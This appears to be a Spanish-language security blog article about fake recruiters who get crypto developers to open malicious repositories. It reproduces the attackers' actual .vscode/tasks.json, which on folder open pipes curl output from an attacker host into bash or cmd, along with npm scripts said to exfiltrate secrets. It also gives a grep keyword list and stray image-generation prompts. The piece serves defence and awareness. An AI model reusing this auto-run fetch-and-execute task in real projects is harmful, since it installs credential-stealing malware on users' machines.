La 'Entrevista Contagiosa': Cómo los Falsos Reclutadores Están Hackeando a Desarrolladores

Resumen Ejecutivo: Una nueva ola de ataques patrocinados por estados está apuntando a desarrolladores senior en el espacio cripto. Los estafadores se hacen pasar por reclutadores y CTOs para engañar a los candidatos y hacer que abran repositorios maliciosos. Este artículo analiza el caso de 'Martin Erazo', el exploit 'tasks.json' de VS Code y el 'Protocolo de Quema' que necesitas para sobrevivir.

Descargo de responsabilidad: Este artículo informa sobre un incidente de ciberseguridad específico que involucra la suplantación de personas reales. Los nombres "Martin Erazo" y "Ara Vartanian" se mencionan únicamente para identificar las "personas" o identidades utilizadas por los atacantes. Creemos que las personas reales que llevan estos nombres son víctimas inocentes de robo de identidad y no están involucradas en estas actividades maliciosas.

---

Prompts de Midjourney

1. /imagine prompt: A dark, moody cybersecurity visualization of a developer's workstation, a red "WARNING" hologram projecting from a VS Code terminal, malicious code tendrils reaching for a crypto wallet icon, text "Contagious Interview" --ar 16:9
2. /imagine prompt: A split screen composition. Left side: A friendly LinkedIn recruiter profile. Right side: A hacker in a hoodie executing a script, matrix code rain in background, text "Social Engineering" --ar 16:9
3. /imagine prompt: A digital shield protecting a laptop, "VS Code Hardening" concept, sleek blue and white cybernetics, defending against red laser attacks --ar 16:9

---

1. El Cebo Perfecto: La Persona "Martin Erazo"

Comienza con un mensaje que toca todas las notas correctas para un ingeniero senior:

• El Rol: CTO / Arquitecto Senior.
• El Presupuesto: $6M de financiación asegurada.
• La Tecnología: Web3, IA, Infraestructura Descentralizada.

En un ataque verificado reciente, un reclutador haciéndose pasar por "Martin Erazo" contactó a través de LinkedIn. El perfil utilizaba el nombre y la foto de un director de teatro real, pero el historial laboral había sido fabricado para mostrar un giro repentino hacia la "Gestión de Proyectos TI" en 2025—una señal clásica de una cuenta robada o comprada.

La estafa pivota rápidamente. Saltan los filtros estándar de RR.HH. y pasan directamente a una "entrevista técnica" con un ejecutivo de alto perfil—en este caso, una suplantación del verdadero CTO de la industria, Ara Vartanian (actualmente en Limit Break).

La Bandera Roja: El nombre del proyecto cambiaba constantemente. El reclutador promocionaba "Betfin" (una plataforma GameFi), pero la presentación (pitch deck) proporcionada era para "SpaceXView" (un proyecto de Metaverso). Esta inconsistencia es un sello distintivo de estafadores reutilizando activos de diferentes campañas.

2. La Trampa: "Revisa Nuestro Código MVP"

El falso "CTO" afirma que necesita tu ojo experto en su código MVP. Envían un repositorio de GitHub o un archivo ZIP. Te presionan para que lo abras durante la entrevista o inmediatamente después.

Este es el ataque.

Confían en tu amabilidad y ego. Asumes que estás allí para encontrar errores en sus componentes React. En realidad, los errores son características diseñadas para vaciar los ahorros de tu vida.

3. El Exploit Técnico: Malware Zero-Click

Los atacantes utilizan un exploit "Zero-Click" o "Low-Click" dirigido a herramientas de desarrollo. No necesitan que ejecutes la aplicación. Solo necesitan que abras la carpeta.

La "Pistola Humeante": .vscode/tasks.json

En este caso específico, el repositorio contenía un archivo armonizado (weaponized) .vscode/tasks.json. Este archivo le dice a VS Code cómo construir el proyecto.

El Código Malicioso:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen": Este es el interruptor de muerte. En el momento en que abres la carpeta en VS Code, esta tarea se ejecuta automáticamente.
• La Carga Útil (Payload): Usa curl para descargar un script desde vscodesettingtask.vercel.app. Este dominio es un host de malware conocido disfrazado como una API de configuraciones.
• El Resultado: El script se ejecuta en la RAM, robando tus contraseñas de Chrome, cookies de sesión y claves SSH al instante.

El Respaldo: Scripts package.json

Si el exploit de VS Code falla, manipulan los scripts de npm:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

Ejecutar npm install o npm start activa server/server.js, un script local de Comando y Control que exfiltra tus variables de entorno (claves AWS, semillas de billetera) al atacante.

4. Banderas Rojas vs. Banderas Verdes

¿Cómo detectar esto antes de que sea demasiado tarde?

Si eres desarrollador, desconfía de los "repositorios privados" y archivos ZIP. Las empresas legítimas utilizan repositorios públicos o pruebas estándar para llevar a casa.

Advertencia: Esta no es la única forma en que los desarrolladores son atacados. Lee sobre la Trampa del Colaborador en Discord y cómo los Ataques a la Cadena de Suministro pueden comprometer tus dependencias.

5. Protocolo de Seguridad: Cómo Entrevistarse de Forma Segura

Si eres un desarrollador senior, serás un objetivo. Endurecer tu entorno es obligatorio.

Protocolo 1: El Entorno "Burner" (Desechable)

Nunca uses tu estación de trabajo principal para pruebas de código.

• Máquinas Virtuales: Usa VirtualBox o VMWare.
• IDEs en la Nube: Usa GitHub Codespaces o Gitpod. Estos son efímeros y están aislados de tus archivos locales de billetera.

Protocolo 2: La Auditoría Forense

Antes de abrir cualquier código desconocido:

1. Revisa .vscode/tasks.json: Busca runOn: folderOpen.
2. Revisa package.json: Busca scripts sospechosos de preinstall o postinstall.
3. Busca Palabras Clave: Haz Grep de curl, wget, os.homedir(), .ssh o wallet.

Protocolo 3: Endurecimiento de VS Code

Deshabilita la "Confianza en el Espacio de Trabajo" (Workspace Trust) globalmente.

• Configuración -> Seguridad -> Espacio de Trabajo -> Confianza: Aviso de Inicio -> Siempre.
• Esto fuerza a VS Code a pedir permiso antes de ejecutar cualquier tarea a nivel de carpeta.

6. Remediación: El "Protocolo de Quema"

Si abriste un repositorio malicioso (como el enviado por la persona "Martin Erazo"), asume que estás comprometido. Restaurar el Sistema no es suficiente.

1. Desconecta: Tira del cable Ethernet inmediatamente.
2. Quema las Billeteras: Tus claves privadas se han ido. Crea una nueva billetera en un dispositivo limpio (teléfono) y transfiere los fondos restantes. Nunca uses la vieja semilla de nuevo.
3. Mata las Sesiones: Cierra sesión en todos los dispositivos en Google, GitHub y AWS. Revoca todas las sesiones activas.
4. Audita Claves SSH: Revisa tu configuración de GitHub/GitLab. Los atacantes a menudo añaden su clave SSH para mantener acceso por puerta trasera. Elimina cualquier clave que no reconozcas.
5. Nuke It (Bombardéalo): Borra el disco y reinstala el SO. Es la única forma de estar 100% seguro de que el rootkit se ha ido.